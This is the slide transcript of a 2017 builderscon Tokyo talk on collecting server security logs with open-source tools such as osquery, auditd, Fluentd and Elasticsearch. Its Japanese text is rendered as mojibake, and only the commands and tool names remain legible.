$30 off During Our Annual Pro Sale. View Details »

OSSで始めるセキュリティログ収集/oss-securitylog-builderscon2017

bungoume
August 05, 2017

 OSSで始めるセキュリティログ収集/oss-securitylog-builderscon2017

bungoume

August 05, 2017
Tweet

More Decks by bungoume

Other Decks in Technology

Transcript

  1. 1
    OSSͰ࢝ΊΔ
    ηΩϡϦςΟϩάऩू
    ക࡚ ༟ར
    builderscon tokyo 2017

    View Slide

  2. 2
    ࣗݾ঺հ
    ക࡚ɹ༟ར (Yuri Umezaki)
    DevOps: ϩά෼ੳɾݕࡧAPIɾΠϯϑϥ؅ཧ
    Python, Elasticsearch, Docker

    View Slide

  3. 3
    Ξϯέʔτ
    ɾ։ൃऀ
    ɾӡ༻ɺΠϯϑϥ؅ཧऀ
    ɾηΩϡϦςΟΤϯδχΞ
    ͋ͳͨͷۀ຿ʹ͍ۙͷ͸

    View Slide

  4. 4
    ηΩϡϦςΟڴҖ
    վ͟Μɾ৘ใྲྀग़
    ϥϯαϜ΢ΣΞ etc…
    ɾ಺෦ෆਖ਼
    ɹ(ૢ࡞ϛε)
    ϑΝΠΞ΢Υʔϧ
    IDS/IPS/WAF
    αʔό(ػີσʔλ)



    ͳͲ
    ɾ֎෦߈ܸ
    ڴҖ͸֎෦ͱ಺෦
    ྆ํʹજΉ

    View Slide

  5. ɾ཈ࢭɿࢥ͍ͱͲ·ΒͤΔ
    5
    ηΩϡϦςΟରࡦͷ෼ྨ
    ɾ༧๷ɿΞΫηε੍ޚͳͲ
    ɾݕ஌ɿ໰୊Λݕग़ɺ෮چͷख͕͔ΓΛه࿥
    ɾ෮چɿෆਖ਼ͷ͋ͬͨલʹ໭͢
    Ұൠʹ4ͭʹ෼ྨ
    ཈ࢭɾ༧๷ͱ͍ͬͨ๷ޚͷରࡦ͕ଟ͍

    View Slide

  6. 6
    ৵ೖ΁ͷؾ͖ͮํ
    ɾࣾ಺ͷਓ͕ෆ৹ͳ఺ʹؾ෇͘
    ɾ֎෦ͷ਌੾ͳϗϫΠτϋοΧʔ͔Βͷ࿈བྷ
    ɾϢʔβ͔Βͷ໰͍߹ΘͤͰൃ֮
    ɾ߈ܸऀࣗ਎͕ڭ͑ͯ͘ΕΔ ←
    ໿൒਺͕֎෦͔Βͷࢦఠ*ͱ͍͏࿩΋
    * FireEye M-Trends 2017: ηΩϡϦςΟ৵֐͓ΑͼαΠόʔ߈ܸͷ೥ؒτϨϯυ
    https://www.fireeye.jp/current-threats/annual-threat-report/mtrends.html

    View Slide

  7. 7
    ֎෦߈ܸͷݕग़
    ɾΞΫηεϩά΍IDS౳Ͱෆ৹ͳ௨৴Λݕग़
    ɾϗετܕηΩϡϦςΟ੡඼Ͱݕ஌
    ֎ͱαʔόͷதؒ੡඼Ͱ͋Δఔ౓कΒΕ͍ͯΔ
    ࠷ޙ͸ϗετʢαʔόࣗମʣͰݕग़͢Δ͔͠ͳ͍
    αʔόͰ΋࠷௿ݶͷϩά͸ऩू͓͖͍ͯͨ͠

    View Slide

  8. 8
    ಺෦ෆਖ਼ͷݕग़
    ɾ୭͕͍ͭαʔόʹϩάΠϯ͍ͯ͠Δ͔
    ɾαʔόͰԿΛ͍ͯ͠Δ͔(ૢ࡞ϩά)
    γεςϜ؅ཧऀͷೝূϩά͕ॏཁ
    ·ͣ͸αʔόͰͷೝূɾૢ࡞ϩάΛऩू͍ͨ͠

    View Slide

  9. 9
    ૢ࡞ϩάͲ͏औΔʁ
    ɾbash history
    ɾscriptίϚϯυ
    ɾpsacct
    ɾaudit
    ؆୯ʹه࿥ఀࢭɾॻ͖׵͑Ͱ͖ͯ͠·͏
    Ҿ਺ͳͲ͕֬ೝͰ͖ͳ͍,ίϚϯυ໊௕੍ݶ
    ؂ࠪϩάͱͯ͠ྑͦ͞͏

    View Slide

  10. 10
    audit log
    # systemctl start auditd
    # auditctl -a always,exit -F arch=b64 -S execve
    ls ͚ͩͰෳ਺ߦϩά͕ग़Δ
    ύʔε͠ʹ͍͘…
    /var/log/audit/audit.log

    View Slide

  11. 11
    audit logΛ׆༻͍ͨ͠
    ɾgo-audit
    Slack੡ͷauditlogΛ͍͍ײ͡ʹύʔε͢Δπʔϧ
    ɾElastic Beats
    Filebeat 5.4(2017/5/4) ΑΓauditlogͷύʔα௥Ճ!
    ɾosquery
    ↑ࠓճ͸͜Ε
    ࢲͷ஌͍ͬͯΔൣғͰ͸ҎԼͷύʔα͕ศརͦ͏

    View Slide

  12. 12
    osquery
    Facebook੡ͷϚγϯঢ়گ֬ೝπʔϧ
    ɾSQLͰ࣮ߦதͷϓϩηεɺϩάΠϯঢ়گͳͲ͕֬ೝͰ͖Δ
    osqueryi
    ɾεέδϡʔϧ࣮ߦͰϩάΛग़͠ɺ؂ࢹʹ΋ར༻Ͱ͖Δ
    osqueryd
    ɾLinux͚ͩͰͳ͘ɺwindows, macͰ΋ར༻Մೳ
    ஫: OSʹΑͬͯऔΕͳ͍छྨ͕͋Γ·͢ɻaudit events͸Ubuntu,CentOSͷΈ

    View Slide

  13. 13
    osquery
    2017/8/3 ݱࡏ githubͷstar͸9501
    Linux Security Tools (Top 100) *ͷ10൪໨ʹ঺հ
    * https://linuxsecurity.expert/security-tools/top-100/

    View Slide

  14. 14
    Linux Security Tools (Top 100)
    * https://linuxsecurity.expert/security-tools/top-100/

    View Slide

  15. 15
    ࿅श: macͰosquery
    $ brew install osquery

    View Slide

  16. 16
    ࿅श: macͰosquery
    chrome֦ுͳͲ·Ͱ෼͔Δ

    View Slide

  17. 17
    LinuxͰosqueryd
    vim /etc/osquery/osquery.conf
    osqueryΛఆظ࣮ߦͯ͠ϩάʹग़ͯ͠ΈΔɹ
    service osqueryd restart

    View Slide

  18. 18
    osquerydͷϩά
    /var/log/osquery/osqueryd.results.log
    ʹϩά͕JSONͰॻ͖ग़͞ΕΔ

    View Slide

  19. 19
    audit events
    ֎෦ͱͷ௨৴ཤྺΛऔΔͳΒsocket_events΋
    vim /etc/osquery/osquery.conf

    View Slide

  20. 20
    audit events
    /etc/osquery/osquery.flags ʹҎԼΛهࡌ
    socket_eventsΛऔಘ͢Δ৔߹͸
    ΋ඞཁ

    ʢ஫:͜ͷΦϓγϣϯΛ͚ͭΔͱCPU࢖༻཰͕૿͑Δʣ

    View Slide

  21. 21
    process_events ϩά
    lsͷ࣮ߦϩά

    View Slide

  22. 22
    socket_events ϩά

    View Slide

  23. 23
    ϑΝΠϧ੔߹ੑ؂ࢹ
    ࡞੒/มߋ/࡟আΛϑΝΠϧ΍ύε୯ҐͰ؂ࢹ
    vim /etc/osquery/osquery.conf

    View Slide

  24. 24
    ϑΝΠϧ੔߹ੑ؂ࢹ ϩά
    AIDE,OSSEC,Tripwire ͋ͨΓͷ୅ସʹͳΔ͔΋
    echo “message” >> /etc/test ޙͷϩά

    View Slide

  25. 25
    osquery ৭ʑऔΕΔ!
    ೝূɾૢ࡞ϩάΛऔΔ໨తͰܾΊ͚ͨͲ

    ϗετܕIDSͱͯ͠े෼ػೳͦ͠͏
    υΩϡϝϯτ΋ॆ࣮
    ίϚϯυ׳Εͯͳ͍ਓʹ΋࢖͍΍͍͢ʢ͔΋ʣ
    εέδϡʔϧ࣮ߦͰ͖Δ
    ݁Ռ͕JSONͰు͖ग़͞ΕΔͷͰ׆༻ָ͕ʢॏཁʣ

    View Slide

  26. 26
    osquerydͷ࢓૊Έ(ͬ͘͟Γ)
    ಺෦Ͱ͸RocksDBͱ͍͏key-valueܕσʔλετΞΛར༻
    https://code.facebook.com/posts/1411870269134471/how-rocksdb-is-used-in-osquery/
    osqueryd͸ఆظΫΤϦΛ࣮ߦ࣌

    લճͷ݁Ռ͕RocksDBʹ֨ೲ͞Ε͍ͯͳ͍͔νΣοΫ͢Δ
    ɾσʔλ͕ͳ͍৔߹
    - ͢΂ͯͷߦΛදࣔ͠ɺ݁ՌΛ֨ೲ
    ɾҎલͷ݁Ռ͕DBʹ͋Δ৔߹
    - 2ͭͷσʔληοτΛൺֱ͠ɺࠩ෼Λग़ྗ

    View Slide

  27. 27
    osquerydͷ࢓૊Έ(ͬ͘͟Γ)
    ఆظ֬ೝͷؒʹมߋͯ͠໭ͨ͠Β௨஌͞Εͳ͍ͷͰ͸ʁ
    ϑΝΠϧ੔߹ੑ؂ࢹʹ͍ͭͯ
    Event-based monitoringͳͷͰมߋͷ৘ใ͕อ࣋͞ΕΔ
    (fileͰ͸inotify͓ΑͼFSEventsΛ࢖༻)

    View Slide

  28. 28
    ԿΛ؂ࢹର৅ʹ͢Δ͔(Ұྫ)
    ɾೝূϩάʢϩάΠϯΠϕϯτʣ
    ɾૢ࡞ϩά
    ɾ௨৴ϩά
    ɾϋʔυ΢ΣΞ઀ଓϩά

    View Slide

  29. 29
    ԿΛ؂ࢹର৅ʹ͢Δ͔(୺຤)
    ɾChrome, firefoxͷplugin
    ɾ֦ுػೳʹϚϧ΢ΣΞ͕ೖΔέʔε͕ۙ೥໰୊ʹ
    ɾhomebrew౳ϥΠϒϥϦͷҰཡ
    ɹɾ༗໊ॴͱࣅ໊ͨલͷϚϧ΢ΣΞ͕npmͰݟ͔ͭΔ
    HTTP Headers ͱ͍͏ 5ສਓ͕࢖͍ͬͯΔ Chrome ֦ுͷϚϧ΢ΣΞٙ࿭
    http://blog.clock-up.jp/entry/2016/11/03/http-headers-malware
    npmjs.com Ͱஶ໊ιϑτ΢ΣΞʹΑ͘ࣅ໊ͨલͷϚϧ΢ΣΞ͕େྔʹൃݟ͞Εͨ
    http://gfx.hatenablog.com/entry/2017/08/02/131537

    View Slide

  30. 30
    Pack
    osquery_monitoring
    it_compliance, incident_response
    osx-attacks, vuln-management
    osqueryʹ͸ΫΤϦύοΫ΋༻ҙ͞Ε͍ͯΔ
    hardware-monitoring

    View Slide

  31. 31
    osquery.conf ઃఆྫ
    ·ͣ͸Pack + ࢖͏ͱ͜Ζ͔Β

    View Slide

  32. 32
    Logrotate΋๨Εͣʹ
    ݁ߏͳϩάͷྔʹͳΔͷͰɺlogrotate͸ඞཁ
    /etc/logrotate.d/osqueryd
    dailyͩͱਏ͍͜ͱ΋͋ΔͷͰhourly͕ྑ͍͔΋

    View Slide

  33. 33
    ϩάΛूΊΔ
    S3

    View Slide

  34. 34
    FluentdͰύʔε
    JSONͳͷͰfluentdͰͷύʔε͕؆୯

    View Slide

  35. 35
    Elasticsearch΁ϩάอଘ

    View Slide

  36. 36
    ϢʔβͷίϚϯυཤྺ

    View Slide

  37. 37
    sshdϩάΠϯࢼߦ

    View Slide

  38. 38
    ϩάͷ࢖͍ํɺӡ༻
    ElasticsearchʹϩάೖΕ͓͚ͯ͹ɺ
    Elastalert΍WatcherΛར༻ͯ͠
    ҟৗͳૢ࡞΍஫ҙ͕ඞཁͳίϚϯυΛݕࡧ/௨஌Մೳʹ

    View Slide

  39. 39
    νϟοτπʔϧʹ௨஌
    ϩάΠϯΠϕϯτΛSlackʹ௨஌͢Δ
    ௨஌͕͋ͬͨΒ࣮ߦऀ͕֬ೝίϝϯτ͢Δ͜ͱͰ
    ͩΕ͕ɾ͍ͭɾͲ͏͍͏໨తͰαʔόૢ࡞͍ͯ͠Δ͔

    ৘ใڞ༗ͱ(Ұछͷ)ଟཁૉೝূ͕Ͱ͖Δ

    View Slide

  40. 40
    ஫ҙ఺ͳͲ
    ɾosqueryͷ։ൃ͸׆ൃ
    ɹɾҎલ͸Disk IO͕૿͑Δόά͕͋ͬͨ(मਖ਼ࡁ)
    ɾϝϞϦ͸100MB΄Ͳফඅ
    ɾsocket؂ࢹΛ༗ޮʹ͢ΔͱCPUΛফඅ(5%ఔ౓?)
    ɾosqueryd͸εέδϡʔϧํࣜ
    ɹɾϩάॻ͖ग़͠Ͱ׬શੑ͸গ͠ऑ͍
    ɹɾgo-auditͳͲπʔϧΛ૊Έ߹Θͤͯ࢖͍·͠ΐ͏

    View Slide

  41. 41
    OSSͰ࢝ΊΔ
    ηΩϡϦςΟϩάऩू
    ക࡚ ༟ར
    builderscon tokyo 2017

    View Slide

  42. 42
    OSS osqueryͰ࢝ΊΔ
    ηΩϡϦςΟϩάऩू
    ക࡚ ༟ར
    builderscon tokyo 2017

    View Slide

  43. 43
    ·ͱΊ
    ɾηΩϡϦςΟӡ༻ෛՙ͕গͳ͍ܗͰશମઃܭ͢Δ
    ɾ༏ઌ౓ͷߴ͍ϩά͔Β׆༻͍ͯ͘͠
    ɾϩάͷվ͟Μ΍ϩετΛճආ͢Δػߏ΋ݕ౼͠Α͏
    ɾ߈ܸͷ༧๷΍෮چ΁ͷखॱཱ֬΋େ੾

    View Slide

  44. 44
    osquery͸ۜͷ஄ؙͰ͸ͳ͍
    ૊Έ߹Θͤͯར༻͠·͠ΐ͏
    osqueryೖΕͯOKͰ͸ͳ͘

    View Slide

  45. 45
    osquery ೔ຊͰ΋࢖͍͖ͬͯ·͠ΐ͏

    View Slide